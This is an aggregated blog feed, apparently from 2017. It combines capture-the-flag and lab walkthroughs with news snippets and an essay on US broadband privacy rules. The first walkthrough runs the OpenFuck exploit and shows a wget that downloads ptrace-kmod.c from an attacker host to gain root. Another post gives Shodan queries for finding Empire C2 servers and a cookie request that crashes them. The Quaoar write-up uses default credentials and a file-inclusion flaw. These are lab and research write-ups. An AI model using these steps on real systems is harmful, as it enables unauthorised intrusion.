0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)
0x6d - RedHat Linux 7.2 (apache-1.3.24)
0x6e - RedHat Linux 7.2 (apache-1.3.26)
0x6f - RedHat Linux 7.2 (apache-1.3.26-snc)
0x70 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)1
0x71 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)2
0x72 - RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)
0x73 - RedHat Linux 7.3 (apache-1.3.23-11)1
0x74 - RedHat Linux 7.3 (apache-1.3.23-11)2
0x75 - RedHat Linux 7.3 (apache-1.3.27)
0x76 - RedHat Linux 8.0 (apache-1.3.27)
0x77 - RedHat Linux 8.0-second (apache-1.3.27)
0x78 - RedHat Linux 8.0 (apache-2.0.40)
0x79 - Slackware Linux 4.0 (apache-1.3.6)
0x7a - Slackware Linux 7.0 (apache-1.3.9)
0x7b - Slackware Linux 7.0 (apache-1.3.26)
0x7c - Slackware 7.0 (apache-1.3.26)2
0x7d - Slackware Linux 7.1 (apache-1.3.12)
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x7f - Slackware Linux 8.1 (apache-1.3.24)
0x80 - Slackware Linux 8.1 (apache-1.3.26)
0x81 - Slackware Linux 8.1-stable (apache-1.3.26)
0x82 - Slackware Linux (apache-1.3.27)
0x83 - SuSE Linux 7.0 (apache-1.3.12)
0x84 - SuSE Linux 7.1 (apache-1.3.17)
0x85 - SuSE Linux 7.2 (apache-1.3.19)
0x86 - SuSE Linux 7.3 (apache-1.3.20)
0x87 - SuSE Linux 8.0 (apache-1.3.23)
0x88 - SUSE Linux 8.0 (apache-1.3.23-120)
0x89 - SuSE Linux 8.0 (apache-1.3.23-137)
0x8a - Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)
Looks like we need to do a little more. So we know we have RedHat and we know it's apache 1.3.20. So looks like our options are

0x6a or 0x6b

Lets try the first one


root@kali:~# ./openfuck 0x6a 172.16.2.13 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80ffe70
Ready to send shellcode
Spawning shell...
Good Bye!

Doesn't look like it so lets try the other one


root@kali:~# ./openfuck 0x6b 172.16.2.13 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
ace-kmod.c; rm ptrace-kmod.c; ./p; wget 172.16.2.21/ptrace-kmod.c; gcc -o p ptr
--15:08:48-- http://172.16.2.21/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 172.16.2.21:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 4,128 [text/x-csrc]

0K .... 100% @ 3.94 MB/s

15:08:48 (3.94 MB/s) - `ptrace-kmod.c' saved [4128/4128]

/usr/bin/ld: cannot open output file p: Permission denied
collect2: ld returned 1 exit status
pwd
/tmp
whoami
root

We have root! Also it might take a couple times of running OpenFuck before it works but it will work if all is set up correctly. In another post i'll go over troubleshooting for OpenFuck since I had a hard time after doing a dist-upgrade of kali. Hope y'all enjoy these walk throughs.

by k0ncepts (noreply@blogger.com)

In the news

"EE.UU. se ha convertido en un auténtico gulag, donde vivimos con la bota sobre nuestro rostro" - RT en Español - Noticias internacionales


RT en Español - Noticias internacionales

"EE.UU. se ha convertido en un auténtico gulag, donde vivimos con la bota sobre nuestro rostro"
RT en Español - Noticias internacionales
En este episodio de 'Keiser Report', Max Keiser y Stacy Herbert abordan cómo se ha acabado con la privacidad en Internet por un miserable millón de dólares. En la segunda parte de la emisión Max prosigue su entrevista a Jaromil, de Dyne.org, sobre las ...

and more »

April 05, 2017

In the news

Trasformatorio 2017 - Arte.it


Arte.it

Trasformatorio 2017
Arte.it
L'evento è organizzato da Siddharte e Dyne.org con il patrocinio dell'Amministrazione comunale di Scaletta Zanclea e in collaborazione con WISH (World International Sicilian Heritage), CairoTronica (Simposio internazionale di Arti Digitali del Cairo ...

and more »

Messina: al via la terza edizione del Trasformatorio al Castello Rufo Ruffo di Scaletta Zanclea - Stretto web


Stretto web

Messina: al via la terza edizione del Trasformatorio al Castello Rufo Ruffo di Scaletta Zanclea
Stretto web
L'evento è organizzato da Siddharte e Dyne.org con il patrocinio dell'Amministrazione comunale di Scaletta Zanclea e in collaborazione con WISH (World International Sicilian Heritage), CairoTronica (Simposio internazionale di Arti Digitali del Cairo ...

and more »

Chokepoint

Hunting Red Team Empire C2 Infrastructure

Introduction

While playing around with setting up my C2 nodes and redirectors for an engagement, I decided to start poking around at both Empire and Meterpreter's default setups. The end goal of this project was to be able to positively identify nodes on the Internet that are being used actively by attackers or Red Teams with little to no scope filtering. The results were interesting, and the first time investigating revealed over twenty easy to find C2 nodes running stock Empire or Meterpreter reverse http/s sessions.

History of Failure

Coding is difficult, even for hackers. Both Empire, and Metasploit projects have a history of Remote Code Execution vulnerabilities. Red Teams need to go to great lengths in order to keep people from compromising their crown jewels which includes active agents and client data.

Empire RCE
Metasploit RCE

Empire

Empire, now in beta for 2.0 includes both Powershell Empire as well as the python version Empyre. The Empire listener is based on BaseHTTPServer in Python and provides an extraction layer on top of it. Let's take a look at the HTTP headers that are present in default Empire configuration.

Empire Headers

Using the HTTP request of GET / HTTP/1.1, the following headers were returned.


HTTP/1.0 200 OK
Server: Microsoft-IIS/7.5
Date: Wed, 05 Apr 2017 18:26:10 GMT

The thing that stands out here is the general lack of headers that would normally be present in a request. Also, the fact that we used HTTP/1.1 as the protocol, but the reply is still for HTTP/1.0

Empire default page


<html><body><h1>It works!</h1><p>This is the default web page for this server.</p><p>The web server software is running but no content has been added, yet.</p></body></html>

Hashes of defaul page

MD5: 885ecd7910c988f1f15fcacca5e1734e
SHA1: b642227fbc703af1a67edb665241fc709ecd6f6e
SHA2: a58fb107072d9523114a1b1f17fbf5e7a8b96da7783f24d84f83df34abc48576

Finding Empire Listeners with Shodan

Shodan is a search engine for Security Researchers. They routinely scan common ports across the Internet, and make the data publicly available, and easily searchable. APIs are also provided for automating a lot of the tasks required.

Using the common headers, and default web page listed above, we are able to narrow down the list of possible Empire C2 nodes on the Internet with a simple query.


'Microsoft-IIS/7.5' 'It works!' -'Content-Type' -'Set-Cookie'

You'll notice that the results returned all are HTTP/1.0 with matching profiles that we scoped out above.

Finding an exception in Empire

The HTTP module in Empire is located in lib/common/http.py. Go ahead and use your favorite text editor to open that up, and have a look around at the code.

In the class RequestHandler and method do_GET we have the following piece of code for handling parsing of cookie data.


if cookie:
# search for a SESSIONID value in the cookie
parts = cookie.split(";")
for part in parts:
if "SESSIONID" in part:
# extract the sessionID value
name, sessionID = part.split("=")

Interesting.
name, sessionID = part.split("=")
If there is more than one equal sign in the cookie field, it'll continue to split on equal signs. That line should be this.
name, sessionID = part.split("=", 1)
In order to limit the number of items to one.

Let's go ahead and try to exploit this from the client side with the following request.


curl http://target:port --Cookie 'SESSIONID=id=id'

Curl will return the following error, because Python threw an exception upon parsing the cookies.


curl: (52) Empty reply from server

Changing default values

While executing a Red Team engagement, it's always a good idea to change the default values of tools that you use, whether it be a scanner or C2 infrastructure. This will make it harder for Blue Team elements to detect portions of your activity. You should also either utilize Empire's whitelisting feature or setup a Firewall in order to keep your test within scope. There is no excuse for leaving your C2 node exposed to the entire Internet.

You should have noticed while browsing http.py that the default page served is also located in that file in the function named default_page.

In order to change the default server name, you must edit the configuration in the empire.db file located in data/. Open it up by using sqlite3 data/empire.db. You can view the current setting by typing SELECT server_version from config;
In order to update it, something like the following will do the job.


update config set server_version = 'nginx' where server_version = 'Microsoft-IIS/7.5';

Going beyond Shodan

Scans.io is another great resource for looking at Internet-wide scans including those for HTTPS sites. The scan sets are huge, but offer a very current view of HTTPs servers across the globe. Data is in JSON format, and the default page is saved in base64 format within each node.


zgrep 'PGh0bWw+PGJvZHk+PGgxPkl0IHdvcmtzITwvaDE+PHA+VGhpcyBpcyB0aGUgZGVmYXVsdCB3ZWIgcGFnZSBmb3IgdGhpcyBzZXJ2ZXIuPC9wPjxwPlRoZSB3ZWIgc2VydmVyIHNvZnR3YXJlIGlzIHJ1bm5pbmcgYnV0IG5vIGNvbnRlbnQgaGFzIGJlZW4gYWRkZWQsIHlldC48L3A+PC9ib2R5PjwvaHRtbD4=' 20170221-https.gz > /tmp/results.json

This may take several minutes to run, as the datasets are generally several gigabytes in size. The result will be a file containing JSON data for each host that returned the default Empire HTML. You can parse this file and extract each IP address that should be tested, and then feed them into the script below.

Automating detection with Python

Use the following to run this script.


python3 empire_identifier.py

Happy hunting, a future post will detail similar experiences with Meterpreter.

by stderr (noreply@blogger.com)

April 03, 2017

Data Knightmare

dataKnightmare 1x25 - Intervista a JM Porup sulle 95 tesi per il mondo immateriale

JM Porup, autore delle "95 tesi per il mondo immateriale" (bit.ly/95cyberit) risponde a dataKnightmare su ciberdiritti, imperialismo dei dati e su come uscire dal capitalismo della sorveglianza nel lungo termine (anche se nel lungo termine saremo tutti morti). UN'ESCLUSIVA RUNTIME RADIO! Dopo la versione in italiano, l'originale in inglese dell' intervista. **** StTARTING AT 31'55", the podcast contains the original English interview. Share and enjoy! JM Porup, author of the "95 Theses of Cyber (bit.ly/95cyber) chats with the dataKnightmare about cyber rights, data empires and how to escape surveillance capitalism in the long run (even if in the long run we will all be dead). A RUNTIME RADIO EXCLUSIVE!

by Runtime Radio

Trasformatorio

T 2017: First Program Draft

Trasformatorio 2017 topic will be “situation based street art”. The program of the lab is designed to establish the ground work’s basics in Scaletta Alta and to lay lines of the surrounding, studying the site in relation to artist’s personal work and to begin transforming it through art interventions. Art interventions will be in the […]

by fredd

April 02, 2017

Chokepoint

hackfest2016: Quaoar - Vulnhub Walk Through

Introduction

This is the first boot2root box I’ll be tackling in a series of boot2roots I’ll be doing to learn. I chose this one because it’s new, it’s beginner stage, and it’s got some helpful hints on Vulnhub to get you started. I’ll be documenting my findings and doing a write up of every box I attempt to boot2root from Vulnhub or other sources. This is both for my benefit and others that might get stuck in the future. Beware that I will have spoilers in these as they show how I gained root on these boxes. I’m using Kali XFCE with 20 gigabytes of hard drive space and basic default settings from VMWare. Nothing to special. The host is a 2014 Macbook pro running the Intel i7 chip. Only the Kali and boot2root VM will be on the same network.

Enumeration

Nmap was one of the hints that the creator of this boot2root had mentioned to use so it’s where I started with. I almost always use the switches –Pn –sV –p1-65535 –A to start with on these boot2roots. Really deep dive the ports and grab headers. If this was a live pen test I likely wouldn’t make that much noise and would stick to top ports or try to find something more targeted from other sources first from pre-engagement. At any case the results of the nmap scan were as follows.

root@kali:~# nmap -Pn -sV -p1-65535 -A 172.16.13.128

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-03-24 08:29 CDT
Nmap scan report for 172.16.13.128
Host is up (0.00041s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
| 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp open domain ISC BIND 9.8.1-P1
| dns-nsid:
|_ bind.version: 9.8.1-P1
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL STLS SASL CAPA TOP RESP-CODES PIPELINING
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_ssl-date: 2017-03-24T13:30:07+00:00; 0s from scanner time.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: capabilities STARTTLS more listed IDLE OK LOGIN-REFERRALS post-login Pre-login ENABLE ID LOGINDISABLEDA0001 LITERAL+ IMAP4rev1 SASL-IR have
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_ssl-date: 2017-03-24T13:30:07+00:00; 0s from scanner time.
445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: AUTH=PLAINA0001 more listed IDLE OK LOGIN-REFERRALS post-login capabilities ENABLE ID Pre-login LITERAL+ IMAP4rev1 SASL-IR have
|_ssl-date: 2017-03-24T13:30:07+00:00; 0s from scanner time.
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL USER SASL(PLAIN) CAPA TOP RESP-CODES PIPELINING
|_ssl-date: 2017-03-24T13:30:07+00:00; 0s from scanner time.
MAC Address: 00:0C:29:C7:5D:11 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.6.3)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2017-03-24T09:30:07-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms 172.16.13.128

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.23 seconds
From nmap we know that we have port 80 open, so next I went to the web browser to see what I could physically see. Nothing of interest there, so I went to DirBuster next as it was hinted to use from the description on VulnHub. I ran DirBuster with the url of http://172.x.x.x:80 and navigated to /usr/share/dirbuster/wordlist/directory-list-1.0.txt. I let this run for 1-2 hours. Once I started seeing the wordpress stuff I figured that’s more or less what the creator wanted me to find to pivot to another tool.
The next tool I will pivot to is wpscan. This will help us determine any vulnerabilities in the plugins and find all directories, themes, and plugins associated with the wordpress server. First lets make sure the database is up to date with a wpscan –update. Next is to run the actual wpscan agains the wordpress site ‘wpscan –url 172.16.13.128/wordpress’. I had to add the /wordpress because that’s where the wordpress site begins. This gives me some useful information about themes and plugins available.

[+] URL: http://172.16.13.128/wordpress/
[+] Started: Fri Mar 24 15:09:59 2017

[!] The WordPress 'http://172.16.13.128/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://172.16.13.128/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://172.16.13.128/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://172.16.13.128/wordpress/wp-includes/

[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[!] 8 vulnerabilities identified from the version number

[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
Reference: https://wpvulndb.com/vulnerabilities/8716
Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
Reference: https://wpvulndb.com/vulnerabilities/8718
Reference: https://www.mehmetince.net/low-severity-wordpress/
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
[i] Fixed in: 3.9.15

[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
Reference: https://wpvulndb.com/vulnerabilities/8719
Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
[i] Fixed in: 3.9.15

[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
Reference: https://wpvulndb.com/vulnerabilities/8720
Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Reference: https://wpvulndb.com/vulnerabilities/8721
Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8730
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 3.9.16

[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
Reference: https://wpvulndb.com/vulnerabilities/8765
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
Reference: http://seclists.org/oss-sec/2017/q1/563
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
[i] Fixed in: 3.9.17

[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
Reference: https://wpvulndb.com/vulnerabilities/8766
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
[i] Fixed in: 3.9.17

[+] WordPress theme in use: twentyfourteen - v1.1

[+] Name: twentyfourteen - v1.1
| Location: http://172.16.13.128/wordpress/wp-content/themes/twentyfourteen/
[!] The version is out of date, the latest version is 1.9
| Style URL: http://172.16.13.128/wordpress/wp-content/themes/twentyfourteen/style.css
| Referenced style.css: wp-content/themes/twentyfourteen/style.css
| Theme Name: Twenty Fourteen
| Theme URI: http://wordpress.org/themes/twentyfourteen
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
| Author: the WordPress team
| Author URI: http://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Fri Mar 24 15:10:02 2017
[+] Requests Done: 48
[+] Memory used: 17.445 MB
[+] Elapsed time: 00:00:02

So from wpscan we now know it’s running the default Wordpress theme of twentyfourteen. It also gives us some other useful information as in what version of Wordpress is running, known vulnerabilities for themes, versions, plugins, etc. But lets try to enumerate users to see if we can’t dig a little deeper. Lets use wpscan again for this ‘wpscan –url 172.16.13.128/wordpress –enumerate u’

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
+----+--------+--------+
| Id | Login | Name |
+----+--------+--------+
| 1 | admin | admin |
| 2 | wpuser | wpuser |
+----+--------+--------+
[!] Default first WordPress username 'admin' is still used

Gaining Access


Interesting! Still using default ‘admin’ account. Wonder if that password has been reset from the default or if it’s using a weak password. Lets check on the wp-login.php page. 172.16.13.128/wordpress/wp-login.php with username ‘admin’ and password ‘admin’. Looks like the password worked! So lets explore just incase wpscan missed anything. Looks like we have 2 plugins of ‘hello dolly’ and ‘mail masta’. A quick google reviels that Mail Masta has a Local File Inclusion exploit associated with it and gives a PoC (proof of concept). Lets give it a try and see if we cannot find the

/etc/passwd file.

BINGO! Alright so now we’ve got a list of users on this box we can try to brute force against or should we dive slightly deeper? Maybe also get /etc/shadow? Well that didn’t quite work, so lets look for more low hanging fruit. Lets see what useful information is in /etc/passwd. In this file we have some great information that goes like this

username:password:UserID:GroupID:Comment:HomeDir:UserShell

Great! So do we have any that have password listed or are the ally ‘x’ meaning that it’s being pulled from shadow file? Nope, doesn’t look that way. So we know that WordPress was pretty default and it looks like one of our users is wpadmin. Lets try and see if we can ssh into that with a default/weak password.

root@kali:/usr/share/dirbuster/wordlists# ssh wpadmin@172.16.13.128
wpadmin@172.16.13.128's password:
Permission denied, please try again.
wpadmin@172.16.13.128's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

* Documentation: https://help.ubuntu.com/

System information as of Sat Mar 25 07:45:42 EDT 2017

System load: 0.12 Processes: 108
Usage of /: 37.6% of 7.21GB Users logged in: 0
Memory usage: 25% IP address for eth0: 172.16.13.128
Swap usage: 11%

Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sat Oct 22 23:03:05 2016 from 192.168.1.26
$

BOOM! We’re in and got our first shell! Lets see where we’re at and what’s in this directory.

$ pwd
/home/wpadmin
$ ls
flag.txt
$ cat flag.txt
2bafe61f03117ac66a73c3c514de796egoo

Privilege Escalation


Ok so now what we have a shell we need to get some privilege escalation. One of the first places I tend to look is in the cron jobs to see what is running.

wpadmin@Quaoar:~$ pwd
/home/wpadmin
wpadmin@Quaoar:~$ cd /etc/cron.
cron.d/ cron.daily/ cron.hourly/ cron.monthly/ cron.weekly/
wpadmin@Quaoar:~$ cd /etc/cron.d
wpadmin@Quaoar:/etc/cron.d$ ls
php5

So it looks like we have some stuff in cron.d which was first on the list. So lets take a look at whats in php5 file.

wpadmin@Quaoar:/etc/cron.d$ cat php5
# /etc/cron.d/php5: crontab fragment for php5
# This purges session files older than X, where X is defined in seconds
# as the largest value of session.gc_maxlifetime from all your php.ini
# files, or 24 minutes if not defined. See /usr/lib/php5/maxlifetime
# Its always a good idea to check for crontab to learn more about the operating system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de
# Look for and purge old sessions every 30 minutes
09,39 * * * * root [ -x /usr/lib/php5/maxlifetime ] && [ -d /var/lib/php5 ] && find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin +$(/usr/lib/php5/maxlifetime) ! -execdir fuser -s {} 2>/dev/null \; -delete

What's that? Is that another hidden flag? "# Its always a good idea to check for crontab to learn more about the operating system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de". Interesting... Upon further reading of others walk throughs I confirmed that this is indeed the 3rd flag but we've still yet to get any privilege escalation so lets continue on.

So we know it's running a WordPress site and we know it's running Apache. So lets take a look at what's in /var/www/ to see if we find any hidden gems.

wpadmin@Quaoar:/$ cd var/www/
wpadmin@Quaoar:/var/www$ ls
CHANGELOG index.html
COPYING INSTALL
hacker-manifesto-ethical.jpg LICENSE
hacking.jpg pososibo-ethical-hacking-hack-fond.jpg
hack-planet-1280-amox-zone.jpg Quaoar.jpg
hack-planet-high-definition-mobile.jpg README.md
Hack_The_Planet2.jpg robots.txt
Hack_The_Planet3.jpg tomcat6-tomcat6-tmp
Hack_The_Planet.jpg upload
hsperfdata_tomcat6 wordpress

Hmm lets cat through some of these files and see what's in them. Seems we have a lot of files to comb over so lets make this a little easier. What I ended up doing was using "grep" to look through multiple files at once.

wpadmin@Quaoar:/var/www$ grep "root" * -R | less

This allows us to look through all the files recursively for "root". Piping to less so we can comb over it all. I also went a step further and used some regex on less to look for "root:" which I suppose I could have done during the grep. I had to really comb over it since it was going through quite a few files but eventually I spotted this


Looks like 'root' has the password 'rootpassword!' so lets give that a try.



That's it! We got all 3 flags at this point. Hope you enjoyed this walk through.

by k0ncepts (noreply@blogger.com)

April 01, 2017

Alan :: law, technology and cinema, washed down with wine

The FCC and the Tectonics of Commercial Surveillance

It’s been a dreadful week if you care about privacy online in the US. Last October the FCC passed broadband consumer privacy rules that constrained ISPs from commercialising users’ browsing data. These rules required that users opt-in to such usage rather than having to opt-out. Companies intent on profiting user data hate opt-in requirements as they know that many will not agree to these uses. Conversely many people who value privacy do not opt-out because they are unaware the option exists, don’t know how to avail of it, or the choice may be presented to them in terms which are confusing – in such cases uses tend to stick to the default setting.

Ajit Pai, the new head of the FCC, made clear his opposition to both the privacy and net neutrality rules when he was one of two Republican minority appointees on the last Commission. Reversal of the privacy rules was lobbied for intensely by the Cable providers (NCTA), wireless companies (CTIA) and the Telecom sector (US Telecom). They were supported by almost the entire advertising sector, notably the Interactive Advertising Bureau (IAB). The sole exception is the Digital Advertising Alliance who have been conspicuous by their silence. DAA represents online advertising behemoths such as Google and Facebook and their interests are somewhat at odds with those of the infrastructure owners.

Sensitive or Insensitive?
Until last October browsing records were in the main classified as insensitive information. Sensitive information is characterized as that relating to financial and health data and information relating to children. This is the Federal Trade Commission’s classification, and is what allows Adtech to collect information about users without their consent. In 2015, as part of the net neutrality process, Broadband provision was re-categorized from information to telecommunications service. This may sound trivial but it meant ISPs became classed as ‘common carriers’ and placed  under the jurisdiction of the FCC. The FCC then determined that browsing history as a whole is sensitive data, requiring companies to get opt-in to be allowed to use it.

Competition between Privacy Invaders

The cable, wireless and telecom companies hate this because they want to get into the personal data fueled advertising business, and their position sitting over the pipe of user data gives them an unparalleled to observe. Google and Facebook meanwhile track users over as much of the web as they can, on their own widely popular properties, and using third party cookies and social media buttons (like!, G+) to track users on other sites who are connect to their infrastructure for advertising or marketing purposes. Effectively this means that they can surveil most users over the lion’s share of their online activity (see the research from Engelhardt & Naranyan). These two colossi currently dominate internet advertising and are obviously keen to suppress the emergence of new competitors. But they also want to protect against the risk of their own data collection being redefined as involving sensitive information – the problem could spread from the FCC to their overseers (ha!) at the FTC. that’s why Google opposed this redefinition and lobbied against it.

Secondly, the DAA have their own self-regulatory privacy framework. This describes the interface of three classes of actors with user privacy: first parties (sites that you visit intentionally); third parties (domains that you interact with unknowingly because they provide services to the first); service providers, who are ISPs. In their schema service providers must get user consent for the use of data for reasons other than performance tuning. This explains why the DAA actively opposed the new privacy rules in the run-up to their introduction but is quiet now. It also explains the slurs being thrown at privacy advocates that they are acting as stooges for Google.

Policy Gobbledygook

With this background let’s parse the Orwellian gobbledygook issued by industry lobbyists after their victory:

“We appreciate today’s Senate action to repeal unwarranted FCC rules that deny consumers consistent privacy protection online and violate competitive neutrality (#1). … Our industry remains committed to offering services that protect the privacy and security of the personal information of our customers (#2). We support this step towards reversing the FCC’s misguided approach and look forward to restoring a consistent approach to online privacy protection that consumers want and deserve (#3).”

#1 = These rules put us at a competitive disadvantage to Google/Facebook, they can intrude, we can’t – it wasn’t fair!

#2 = We’ll decide what information of your is personal and what is not (it’s all entertainment data, right?!). You can trust us.

#3 = Now that users have no privacy protections from either the biggest publishers or the infrastructure providers, the playing field field is finally level! Yes, we could have lobbied to have Google and Facebook subjected to the same constraints and evened things up that way, but nah, silly idea.

The big winners are companies like Verizon who bought AOL to move their business towards online advertising and is in the process of taking over what’s left of Yahoo. They’ve bought themselves an advertising infrastructure with lots of data of their own and can now exploit the data trail of their own customers. AT&T are also in celebratory mood and have been gushing about the Trump administration more generally. Back in 2013 they operated a program called ‘internet preferences’ which instituted additional charges for users who opted out of having their usage data exploited to expose them to behavioural advertising. Have achieved their goal of overturning the regulations, Telecoms are claiming they won’t sell users’ browser history. But selling data is not the model of Google or Facebook either – once sold the  competitive advantage the data provides is lost. Instead they control access to its exploitation on long-term exploitation: they administer the data, marketers pay them directly or indirectly to take advantage of it.

Self-Defense?
